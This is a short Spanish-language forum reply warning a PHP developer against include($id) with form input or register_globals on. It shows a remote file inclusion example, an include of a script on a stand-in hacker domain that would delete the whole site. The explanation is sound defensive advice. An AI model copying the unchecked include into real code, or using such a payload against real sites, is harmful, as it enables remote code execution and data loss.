Te conviene hacer como te dijo Seppo. Y nunca, poner esto:

include($id);

Especialmente, si ese valor llega por un formulario o si tenés register_globals On.

Suponete que lo ponés así. Alguien podría escribir en la barra del navegador http://www.tudominio.com/tuscript.ph...orrar_todo.php

Tu script quedaría:

include("http://www.dominio-hacker.com/borrar_todo.php");

O sea, estarías ejecutando un código que alguien armó y colgó en su servidor para borrarte todo el sitio.

Tené en cuenta que con include/requiere estás ejectuando codígo en tu servidor. Y puede venir de cualquier lado, si no tomás algunas precauciones.

Suerte
Califa